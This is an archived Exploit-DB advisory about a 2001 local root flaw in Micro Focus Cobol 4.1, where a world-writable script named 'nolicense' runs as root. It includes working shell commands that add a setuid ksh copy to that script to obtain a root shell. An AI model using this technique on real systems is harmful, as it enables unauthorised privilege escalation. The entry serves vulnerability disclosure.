Lucene search

K
exploitdbDixie FlatlineEDB-ID:20621
HistoryFeb 12, 2001 - 12:00 a.m.

Micro Focus Cobol 4.1 - Arbitrary Command Execution

2001-02-1200:00:00
Dixie Flatline
www.exploit-db.com
35

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/2359/info

Micro Focus Cobol is a development suite for unix platforms offered by Merant. It is typically licensed on a per-user basis.

If Micro Focus Cobol is installed with the 'Apptrack' feature enabled, local users may be able to elevate privileges. A shell script called 'nolicense' that is executed as root is installed with insecure file permissions.

As a result, attackers may be able to execute arbitrary commands as root if the script is modified.

This is known to affect version 4.1. Though unverified, previous versions of Micro Focus Cobol may also be vulnerable. 

$ cat >> /var/mfaslmf/nolicense
/bin/cp /bin/ksh /tmp; chmod 4755 /tmp/ksh
^D

[wait until the application server licenses are used up]

$ /tmp/ksh
# 

AI Score

7.4

Confidence

Low

Related for EDB-ID:20621